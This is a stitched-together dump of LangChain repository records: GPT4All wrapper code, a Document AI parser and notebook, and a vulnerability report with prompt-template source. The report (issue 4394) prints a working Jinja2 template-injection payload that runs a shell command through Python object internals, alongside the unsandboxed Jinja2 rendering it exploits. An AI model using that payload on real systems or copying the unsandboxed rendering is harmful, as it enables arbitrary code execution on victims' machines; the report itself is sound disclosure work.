from langchain.llms.base import LLM
from langchain.llms.utils import enforce_stop_tokens
from langchain.pydantic_v1 import Extra, Field, root_validator
class GPT4All(LLM):
"""GPT4All language models.
To use, you should have the ``gpt4all`` python package installed, the
pre-trained model file, and the model's config information.
Example:
.. code-block:: python
from langchain.llms import GPT4All
model = GPT4All(model="./models/gpt4all-model.bin", n_threads=8)
# Simplest invocation
response = model("Once upon a time, ")
"""
model: str
"""Path to the pre-trained GPT4All model file."""
backend: Optional[str] = Field(None, alias="backend")
max_tokens: int = Field(200, alias="max_tokens")
"""Token context window."""
n_parts: int = Field(-1, alias="n_parts")
"""Number of parts to split the model into.
If -1, the number of parts is automatically determined."""
seed: int = Field(0, alias="seed")
"""Seed. If -1, a random seed is used."""
f16_kv: bool = Field(False, alias="f16_kv")
"""Use half-precision for key/value cache."""
logits_all: bool = Field(False, alias="logits_all")
"""Return logits for all tokens, not just the last token."""
vocab_only: bool = Field(False, alias="vocab_only")
"""Only load the vocabulary, no weights."""
use_mlock: bool = Field(False, alias="use_mlock")
"""Force system to keep model in RAM."""
embedding: bool = Field(False, alias="embedding")
"""Use embedding mode only."""
n_threads: Optional[int] = Field(4, alias="n_threads")
"""Number of threads to use."""
n_predict: Optional[int] = 256
"""The maximum number of tokens to generate."""
temp: Optional[float] = 0.7
"""The temperature to use for sampling."""
top_p: Optional[float] = 0.1
"""The top-p value to use for sampling."""
top_k: Optional[int] = 40
"""The top-k value to use for sampling."""
echo: Optional[bool] = False
"""Whether to echo the prompt."""
stop: Optional[List[str]] = []
"""A list of strings to stop generation when encountered."""
repeat_last_n: Optional[int] = 64
"Last n tokens to penalize"
repeat_penalty: Optional[float] = 1.18
"""The penalty to apply to repeated tokens."""
n_batch: int = Field(8, alias="n_batch")
"""Batch size for prompt processing."""
streaming: bool = False
"""Whether to stream the results or not."""
allow_download: bool = False
"""If model does not exist in ~/.cache/gpt4all/, download it."""
client: Any = None #: :meta private:
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@staticmethod
def _model_param_names() -> Set[str]:
return {
"max_tokens",
"n_predict",
"top_k",
"top_p",
"temp",
"n_batch",
"repeat_penalty",
"repeat_last_n",
}
def _default_params(self) -> Dict[str, Any]:
return {
"max_tokens": self.max_tokens,
"n_predict": self.n_predict,
"top_k": self.top_k,
"top_p": self.top_p,
"temp": self.temp,
"n_batch": self.n_batch,
"repeat_penalty": self.repeat_penalty,
"repeat_last_n": self.repeat_last_n,
}
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that the python package exists in the environment."""
try:
from gpt4all import GPT4All as GPT4AllModel
except ImportError:
raise ImportError(
"Could not import gpt4all python package. "
"Please install it with `pip install gpt4all`."
)
full_path = values["model"]
model_path, delimiter, model_name = full_path.rpartition("/")
model_path += delimiter
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
)
if values["n_threads"] is not None:
# set n_threads
values["client"].model.set_thread_count(values["n_threads"])
try:
values["backend"] = values["client"].model_type
except AttributeError:
# The below is for compatibility with GPT4All Python bindings <= 0.2.3.
values["backend"] = values["client"].model.model_type
return values
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {
"model": self.model,
**self._default_params(),
**{
k: v for k, v in self.__dict__.items() if k in self._model_param_names()
},
}
@property
def _llm_type(self) -> str:
"""Return the type of llm."""
return "gpt4all"
def _call(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> str:
r"""Call out to GPT4All's generate method.
Args:
prompt: The prompt to pass into the model.
stop: A list of strings to stop generation when encountered.
Returns:
The string generated by the model.
Example:
.. code-block:: python
prompt = "Once upon a time, "
response = model(prompt, n_predict=55)
"""
text_callback = None
if run_manager:
text_callback = partial(run_manager.on_llm_new_token, verbose=self.verbose)
text = ""
params = {**self._default_params(), **kwargs}
for token in self.client.generate(prompt, **params):
if text_callback:
text_callback(token)
text += token
if stop is not None:
text = enforce_stop_tokens(text, stop)
return text
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | docs/docs_skeleton/docs/integrations/document_transformers/docai.ipynb | {
"cells": [
{
"cell_type": "markdown",
"id": "310fce10-e051-40db-89b0-5b5bb85cd145",
"metadata": {},
"source": [
"# Document AI\n"
]
},
{
"cell_type": "markdown",
"id": "f95ac25b-f025-40c3-95b8-77919fc4da7f",
"metadata": {},
"source": [
">[Document AI](https://cloud.google.com/document-ai/docs/overview) is a `Google Cloud Platform` service to transform unstructured data from documents into structured data, making it easier to understand, analyze, and consume. "
]
},
{
"cell_type": "markdown",
"id": "275f2193-248f-4565-a872-93a89589cf2b",
"metadata": {},
"source": [
"The module contains a `PDF` parser based on DocAI from Google Cloud.\n",
"\n",
"You need to install two libraries to use this parser:"
]
},
{
"cell_type": "code",
"execution_count": null,
"id": "34132fab-0069-4942-b68b-5b093ccfc92a",
"metadata": {},
"outputs": [],
"source": [
"!pip install google-cloud-documentai\n",
"!pip install google-cloud-documentai-toolbox"
]
},
{
"cell_type": "markdown",
"id": "51946817-798c-4d11-abd6-db2ae53a0270",
"metadata": {},
"source": [
"First, you need to set up a [`GCS` bucket and create your own OCR processor](https://cloud.google.com/document-ai/docs/create-processor) \n",
"The `GCS_OUTPUT_PATH` should be a path to a folder on GCS (starting with `gs://`) and a processor name should look like `projects/PROJECT_NUMBER/locations/LOCATION/processors/PROCESSOR_ID`. You can get it either programmatically or copy from the `Prediction endpoint` section of the `Processor details` tab in the Google Cloud Console."
]
},
{
"cell_type": "code",
"execution_count": 2,
"id": "ac85f7f3-3ef6-41d5-920a-b55f2939c202",
"metadata": {},
"outputs": [],
"source": [
"PROJECT = \"PUT_SOMETHING_HERE\"\n",
"GCS_OUTPUT_PATH = \"PUT_SOMETHING_HERE\"\n",
"PROCESSOR_NAME = \"PUT_SOMETHING_HERE\""
]
},
{
"cell_type": "code",
"execution_count": 1,
"id": "48438efb-9f0d-473b-a91c-9f1e29c2539d",
"metadata": {},
"outputs": [],
"source": [
"from langchain.document_loaders.blob_loaders import Blob\n",
"from langchain.document_loaders.parsers import DocAIParser"
]
},
{
"cell_type": "markdown",
"id": "fad2bcca-1c0e-4888-b82d-15823ba57e60",
"metadata": {},
"source": [
"Now, let's create a parser:"
]
},
{
"cell_type": "code",
"execution_count": 3,
"id": "dcc0c65a-86c5-448d-8b21-2e564b1903b7",
"metadata": {},
"outputs": [],
"source": [
"parser = DocAIParser(location=\"us\", processor_name=PROCESSOR_NAME, gcs_output_path=GCS_OUTPUT_PATH)"
]
},
{
"cell_type": "markdown",
"id": "b8b5a3ff-650a-4ad3-a73a-395f86e4c9e1",
"metadata": {},
"source": [
"Let's go and parse an Alphabet's take from here: https://abc.xyz/assets/a7/5b/9e5ae0364b12b4c883f3cf748226/goog-exhibit-99-1-q1-2023-19.pdf. Copy it to your GCS bucket first, and adjust the path below."
]
},
{
"cell_type": "code",
"execution_count": 4,
"id": "373cc18e-a311-4c8d-8180-47e4ade1d2ad",
"metadata": {},
"outputs": [],
"source": [
"blob = Blob(path=\"gs://vertex-pgt/examples/goog-exhibit-99-1-q1-2023-19.pdf\")"
]
},
{
"cell_type": "code",
"execution_count": 5,
"id": "6ef84fad-2981-456d-a6b4-3a6a1a46d511",
"metadata": {},
"outputs": [],
"source": [
"docs = list(parser.lazy_parse(blob))"
]
},
{
"cell_type": "markdown",
"id": "3f8e4ee1-e07d-4c29-a120-4d56aae91859",
"metadata": {},
"source": [
"We'll get one document per page, 11 in total:"
]
},
{
"cell_type": "code",
"execution_count": 8,
"id": "343919f5-35d2-47fb-9790-de464649ebdf",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"11\n"
]
}
],
"source": [
"print(len(docs))"
]
},
{
"cell_type": "markdown",
"id": "b104ae56-011b-4abe-ac07-e999c69494c5",
"metadata": {},
"source": [
"You can run end-to-end parsing of a blob one-by-one. If you have many documents, it might be a better approach to batch them together and maybe even detach parsing from handling the results of parsing."
]
},
{
"cell_type": "code",
"execution_count": 9,
"id": "9ecc1b99-5cef-47b0-a125-dbb2c41d2224",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['projects/543079149601/locations/us/operations/16447136779727347991']\n"
]
}
],
"source": [
"operations = parser.docai_parse([blob])\n",
"print([op.operation.name for op in operations])"
]
},
{
"cell_type": "markdown",
"id": "a2d24d63-c2c7-454c-9df3-2a9cf51309a6",
"metadata": {},
"source": [
"You can check whether operations are finished:"
]
},
{
"cell_type": "code",
"execution_count": 10,
"id": "ab11efb0-e514-4f44-9ba5-3d638a59c9e6",
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"True"
]
},
"execution_count": 10,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"parser.is_running(operations)"
]
},
{
"cell_type": "markdown",
"id": "602ca0bc-080a-4a4e-a413-0e705aeab189",
"metadata": {},
"source": [
"And when they're finished, you can parse the results:"
]
},
{
"cell_type": "code",
"execution_count": 11,
"id": "ec1e6041-bc10-47d4-ba64-d09055c14f27",
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"False"
]
},
"execution_count": 11,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"parser.is_running(operations)"
]
},
{
"cell_type": "code",
"execution_count": 12,
"id": "95d89da4-1c8a-413d-8473-ddd4a39375a5",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"DocAIParsingResults(source_path='gs://vertex-pgt/examples/goog-exhibit-99-1-q1-2023-19.pdf', parsed_path='gs://vertex-pgt/test/run1/16447136779727347991/0')\n"
]
}
],
"source": [
"results = parser.get_results(operations)\n",
"print(results[0])"
]
},
{
"cell_type": "markdown",
"id": "87e5b606-1679-46c7-9577-4cf9bc93a752",
"metadata": {},
"source": [
"And now we can finally generate Documents from parsed results:"
]
},
{
"cell_type": "code",
"execution_count": 15,
"id": "08e8878d-889b-41ad-9500-2f772d38782f",
"metadata": {},
"outputs": [],
"source": [
"docs = list(parser.parse_from_results(results))"
]
},
{
"cell_type": "code",
"execution_count": 16,
"id": "c59525fb-448d-444b-8f12-c4aea791e19b",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"11\n"
]
}
],
"source": [
"print(len(docs))"
]
}
],
"metadata": {
"environment": {
"kernel": "python3",
"name": "common-cpu.m109",
"type": "gcloud",
"uri": "gcr.io/deeplearning-platform-release/base-cpu:m109"
},
"kernelspec": {
"display_name": "Python 3 (ipykernel)",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.10.12"
}
},
"nbformat": 4,
"nbformat_minor": 5
}
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself, I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | """Module contains a PDF parser based on DocAI from Google Cloud.
You need to install two libraries to use this parser:
pip install google-cloud-documentai
pip install google-cloud-documentai-toolbox
"""
import logging
import time
from dataclasses import dataclass
from typing import TYPE_CHECKING, Iterator, List, Optional, Sequence
from langchain.docstore.document import Document
from langchain.document_loaders.base import BaseBlobParser
from langchain.document_loaders.blob_loaders import Blob
from langchain.utils.iter import batch_iterate
if TYPE_CHECKING:
from google.api_core.operation import Operation
from google.cloud.documentai import DocumentProcessorServiceClient
logger = logging.getLogger(__name__)
@dataclass
class DocAIParsingResults:
"""A dataclass to store DocAI parsing results."""
source_path: str
parsed_path: str
class DocAIParser(BaseBlobParser):
def __init__(
self,
*,
client: Optional["DocumentProcessorServiceClient"] = None,
location: Optional[str] = None,
gcs_output_path: Optional[str] = None,
processor_name: Optional[str] = None,
):
"""Initializes the parser.
Args:
client: a DocumentProcessorServiceClient to use
location: a GCP location where a DOcAI parser is located
gcs_output_path: a path on GCS to store parsing results
processor_name: name of a processor
You should provide either a client or location (and then a client
would be instantiated).
"""
if client and location:
raise ValueError(
"You should provide either a client or a location but not both "
"of them."
)
if not client and not location:
raise ValueError(
"You must specify either a client or a location to instantiate "
"a client."
)
self._gcs_output_path = gcs_output_path
self._processor_name = processor_name
if client:
self._client = client
else:
try:
from google.api_core.client_options import ClientOptions
from google.cloud.documentai import DocumentProcessorServiceClient
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install google-cloud-documentai`"
)
options = ClientOptions(
api_endpoint=f"{location}-documentai.googleapis.com"
)
self._client = DocumentProcessorServiceClient(client_options=options)
def lazy_parse(self, blob: Blob) -> Iterator[Document]:
"""Parses a blob lazily.
Args:
blobs: a Blob to parse
This is a long-running operations! A recommended way is to batch
documents together and use `batch_parse` method.
"""
yield from self.batch_parse([blob], gcs_output_path=self._gcs_output_path)
def batch_parse(
self,
blobs: Sequence[Blob],
gcs_output_path: Optional[str] = None,
timeout_sec: int = 3600,
check_in_interval_sec: int = 60,
) -> Iterator[Document]:
"""Parses a list of blobs lazily.
Args:
blobs: a list of blobs to parse
gcs_output_path: a path on GCS to store parsing results
timeout_sec: a timeout to wait for DocAI to complete, in seconds
check_in_interval_sec: an interval to wait until next check
whether parsing operations have been completed, in seconds
This is a long-running operations! A recommended way is to decouple
parsing from creating Langchain Documents:
>>> operations = parser.docai_parse(blobs, gcs_path)
>>> parser.is_running(operations)
You can get operations names and save them:
>>> names = [op.operation.name for op in operations]
And when all operations are finished, you can use their results:
>>> operations = parser.operations_from_names(operation_names)
>>> results = parser.get_results(operations)
>>> docs = parser.parse_from_results(results)
"""
output_path = gcs_output_path if gcs_output_path else self._gcs_output_path
if output_path is None:
raise ValueError("An output path on GCS should be provided!")
operations = self.docai_parse(blobs, gcs_output_path=output_path)
operation_names = [op.operation.name for op in operations]
logger.debug(
f"Started parsing with DocAI, submitted operations {operation_names}"
)
is_running, time_elapsed = True, 0
while is_running:
is_running = self.is_running(operations)
if not is_running:
break
time.sleep(check_in_interval_sec)
time_elapsed += check_in_interval_sec
if time_elapsed > timeout_sec:
raise ValueError(
"Timeout exceeded! Check operations " f"{operation_names} later!"
)
logger.debug(".")
results = self.get_results(operations=operations)
yield from self.parse_from_results(results)
def parse_from_results(
self, results: List[DocAIParsingResults]
) -> Iterator[Document]:
try:
from google.cloud.documentai_toolbox.wrappers.document import _get_shards
from google.cloud.documentai_toolbox.wrappers.page import _text_from_layout
except ImportError:
raise ImportError(
"documentai_toolbox package not found, please install it with"
" `pip install google-cloud-documentai-toolbox`"
)
for result in results:
output_gcs = result.parsed_path.split("/")
gcs_bucket_name = output_gcs[2]
gcs_prefix = "/".join(output_gcs[3:]) + "/"
shards = _get_shards(gcs_bucket_name, gcs_prefix)
docs, page_number = [], 1
for shard in shards:
for page in shard.pages:
docs.append(
Document(
page_content=_text_from_layout(page.layout, shard.text),
metadata={
"page": page_number,
"source": result.source_path,
},
)
)
page_number += 1
yield from docs
def operations_from_names(self, operation_names: List[str]) -> List["Operation"]:
"""Initializes Long-Running Operations from their names."""
try:
from google.longrunning.operations_pb2 import (
GetOperationRequest, # type: ignore
)
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install gapic-google-longrunning`"
)
operations = []
for name in operation_names:
request = GetOperationRequest(name=name)
operations.append(self._client.get_operation(request=request))
return operations
def is_running(self, operations: List["Operation"]) -> bool:
for op in operations:
if not op.done():
return True
return False
def docai_parse(
self,
blobs: Sequence[Blob],
*,
gcs_output_path: Optional[str] = None,
batch_size: int = 4000,
enable_native_pdf_parsing: bool = True,
) -> List["Operation"]:
"""Runs Google DocAI PDF parser on a list of blobs.
Args:
blobs: a list of blobs to be parsed
gcs_output_path: a path (folder) on GCS to store results
batch_size: amount of documents per batch
enable_native_pdf_parsing: a config option for the parser
DocAI has a limit on the amount of documents per batch, that's why split a
batch into mini-batches. Parsing is an async long-running operation
on Google Cloud and results are stored in a output GCS bucket.
"""
try:
from google.cloud import documentai
from google.cloud.documentai_v1.types import OcrConfig, ProcessOptions
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install google-cloud-documentai`"
)
if not self._processor_name:
raise ValueError("Processor name is not defined, aborting!")
output_path = gcs_output_path if gcs_output_path else self._gcs_output_path
if output_path is None:
raise ValueError("An output path on GCS should be provided!")
operations = []
for batch in batch_iterate(size=batch_size, iterable=blobs):
documents = []
for blob in batch:
gcs_document = documentai.GcsDocument(
gcs_uri=blob.path, mime_type="application/pdf"
)
documents.append(gcs_document)
gcs_documents = documentai.GcsDocuments(documents=documents)
input_config = documentai.BatchDocumentsInputConfig(
gcs_documents=gcs_documents
)
gcs_output_config = documentai.DocumentOutputConfig.GcsOutputConfig(
gcs_uri=output_path, field_mask=None
)
output_config = documentai.DocumentOutputConfig(
gcs_output_config=gcs_output_config
)
if enable_native_pdf_parsing:
process_options = ProcessOptions(
ocr_config=OcrConfig(
enable_native_pdf_parsing=enable_native_pdf_parsing
)
)
else:
process_options = ProcessOptions()
request = documentai.BatchProcessRequest(
name=self._processor_name,
input_documents=input_config,
document_output_config=output_config,
process_options=process_options,
)
operations.append(self._client.batch_process_documents(request))
return operations
def get_results(self, operations: List["Operation"]) -> List[DocAIParsingResults]:
try:
from google.cloud.documentai_v1 import BatchProcessMetadata
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install google-cloud-documentai`"
)
results = []
for op in operations:
if isinstance(op.metadata, BatchProcessMetadata):
metadata = op.metadata
else:
metadata = BatchProcessMetadata.deserialize(op.metadata.value)
for status in metadata.individual_process_statuses:
source = status.input_gcs_source
output = status.output_gcs_destination
results.append(
DocAIParsingResults(source_path=source, parsed_path=output)
)
return results
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/base.py | """BasePrompt schema definition."""
from __future__ import annotations
import warnings
from abc import ABC
from typing import Any, Callable, Dict, List, Set
from langchain.schema.messages import BaseMessage, HumanMessage
from langchain.schema.prompt import PromptValue
from langchain.schema.prompt_template import BasePromptTemplate
from langchain.utils.formatting import formatter
def jinja2_formatter(template: str, **kwargs: Any) -> str:
"""Format a template using jinja2."""
try:
from jinja2 import Template
except ImportError:
raise ImportError(
"jinja2 not installed, which is needed to use the jinja2_formatter. "
"Please install it with `pip install jinja2`."
)
return Template(template).render(**kwargs)
def validate_jinja2(template: str, input_variables: List[str]) -> None:
"""
Validate that the input variables are valid for the template.
Issues a warning if missing or extra variables are found.
Args:
template: The template string.
input_variables: The input variables.
"""
input_variables_set = set(input_variables)
valid_variables = _get_jinja2_variables_from_template(template)
missing_variables = valid_variables - input_variables_set
extra_variables = input_variables_set - valid_variables
warning_message = ""
if missing_variables:
warning_message += f"Missing variables: {missing_variables} "
if extra_variables:
warning_message += f"Extra variables: {extra_variables}"
if warning_message:
warnings.warn(warning_message.strip())
def _get_jinja2_variables_from_template(template: str) -> Set[str]:
try:
from jinja2 import Environment, meta
except ImportError:
raise ImportError(
"jinja2 not installed, which is needed to use the jinja2_formatter. "
"Please install it with `pip install jinja2`."
)
env = Environment()
ast = env.parse(template)
variables = meta.find_undeclared_variables(ast)
return variables
DEFAULT_FORMATTER_MAPPING: Dict[str, Callable] = {
"f-string": formatter.format,
"jinja2": jinja2_formatter,
}
DEFAULT_VALIDATOR_MAPPING: Dict[str, Callable] = {
"f-string": formatter.validate_input_variables,
"jinja2": validate_jinja2,
}
def check_valid_template(
template: str, template_format: str, input_variables: List[str]
) -> None:
"""Check that template string is valid."""
if template_format not in DEFAULT_FORMATTER_MAPPING:
valid_formats = list(DEFAULT_FORMATTER_MAPPING)
raise ValueError(
f"Invalid template format. Got `{template_format}`;"
f" should be one of {valid_formats}"
)
try:
validator_func = DEFAULT_VALIDATOR_MAPPING[template_format]
validator_func(template, input_variables)
except KeyError as e:
raise ValueError(
"Invalid prompt schema; check for mismatched or missing input parameters. "
+ str(e)
)
class StringPromptValue(PromptValue):
"""String prompt value."""
text: str
"""Prompt text."""
def to_string(self) -> str:
"""Return prompt as string."""
return self.text
def to_messages(self) -> List[BaseMessage]:
"""Return prompt as messages."""
return [HumanMessage(content=self.text)]
class StringPromptTemplate(BasePromptTemplate, ABC):
"""String prompt that exposes the format method, returning a prompt."""
def format_prompt(self, **kwargs: Any) -> PromptValue:
"""Create Chat Messages."""
return StringPromptValue(text=self.format(**kwargs))
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Load prompts."""
import json
import logging
from pathlib import Path
from typing import Callable, Dict, Union
import yaml
from langchain.prompts.few_shot import FewShotPromptTemplate
from langchain.prompts.prompt import PromptTemplate
from langchain.schema import BaseLLMOutputParser, BasePromptTemplate, StrOutputParser
from langchain.utils.loading import try_load_from_hub
URL_BASE = "https://raw.githubusercontent.com/hwchase17/langchain-hub/master/prompts/"
logger = logging.getLogger(__name__)
def load_prompt_from_config(config: dict) -> BasePromptTemplate:
"""Load prompt from Config Dict."""
if "_type" not in config:
logger.warning("No `_type` key found, defaulting to `prompt`.")
config_type = config.pop("_type", "prompt")
if config_type not in type_to_loader_dict:
raise ValueError(f"Loading {config_type} prompt not supported")
prompt_loader = type_to_loader_dict[config_type]
return prompt_loader(config)
def _load_template(var_name: str, config: dict) -> dict:
"""Load template from the path if applicable."""
# Check if template_path exists in config.
if f"{var_name}_path" in config:
# If it does, make sure template variable doesn't also exist.
if var_name in config:
raise ValueError(
f"Both `{var_name}_path` and `{var_name}` cannot be provided."
)
# Pop the template path from the config.
template_path = Path(config.pop(f"{var_name}_path"))
# Load the template.
if template_path.suffix == ".txt":
with open(template_path) as f:
template = f.read()
else:
raise ValueError
# Set the template variable to the extracted variable.
config[var_name] = template
return config
def _load_examples(config: dict) -> dict:
"""Load examples if necessary."""
if isinstance(config["examples"], list):
pass
elif isinstance(config["examples"], str):
with open(config["examples"]) as f:
if config["examples"].endswith(".json"):
examples = json.load(f)
elif config["examples"].endswith((".yaml", ".yml")):
examples = yaml.safe_load(f)
else:
raise ValueError(
"Invalid file format. Only json or yaml formats are supported."
)
config["examples"] = examples
else:
raise ValueError("Invalid examples format. Only list or string are supported.")
return config
def _load_output_parser(config: dict) -> dict:
"""Load output parser."""
if "output_parser" in config and config["output_parser"]:
_config = config.pop("output_parser")
output_parser_type = _config.pop("_type")
if output_parser_type == "regex_parser":
from langchain.output_parsers.regex import RegexParser
output_parser: BaseLLMOutputParser = RegexParser(**_config)
elif output_parser_type == "default":
output_parser = StrOutputParser(**_config)
else:
raise ValueError(f"Unsupported output parser {output_parser_type}")
config["output_parser"] = output_parser
return config
def _load_few_shot_prompt(config: dict) -> FewShotPromptTemplate:
"""Load the "few shot" prompt from the config."""
# Load the suffix and prefix templates.
config = _load_template("suffix", config)
config = _load_template("prefix", config)
# Load the example prompt.
if "example_prompt_path" in config:
if "example_prompt" in config:
raise ValueError(
"Only one of example_prompt and example_prompt_path should "
"be specified."
)
config["example_prompt"] = load_prompt(config.pop("example_prompt_path"))
else:
config["example_prompt"] = load_prompt_from_config(config["example_prompt"])
# Load the examples.
config = _load_examples(config)
config = _load_output_parser(config)
return FewShotPromptTemplate(**config)
def _load_prompt(config: dict) -> PromptTemplate:
"""Load the prompt template from config."""
# Load the template from disk if necessary.
config = _load_template("template", config)
config = _load_output_parser(config)
return PromptTemplate(**config)
def load_prompt(path: Union[str, Path]) -> BasePromptTemplate:
"""Unified method for loading a prompt from LangChainHub or local fs."""
if hub_result := try_load_from_hub(
path, _load_prompt_from_file, "prompts", {"py", "json", "yaml"}
):
return hub_result
else:
return _load_prompt_from_file(path)
def _load_prompt_from_file(file: Union[str, Path]) -> BasePromptTemplate:
"""Load prompt from file."""
# Convert file to a Path object.
if isinstance(file, str):
file_path = Path(file)
else:
file_path = file
# Load from either json or yaml.
if file_path.suffix == ".json":
with open(file_path) as f:
config = json.load(f)
elif file_path.suffix == ".yaml":
with open(file_path, "r") as f:
config = yaml.safe_load(f)
else:
raise ValueError(f"Got unsupported file type {file_path.suffix}")
# Load the prompt from the config now.
return load_prompt_from_config(config)
type_to_loader_dict: Dict[str, Callable[[dict], BasePromptTemplate]] = {
"prompt": _load_prompt,
"few_shot": _load_few_shot_prompt,
}
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
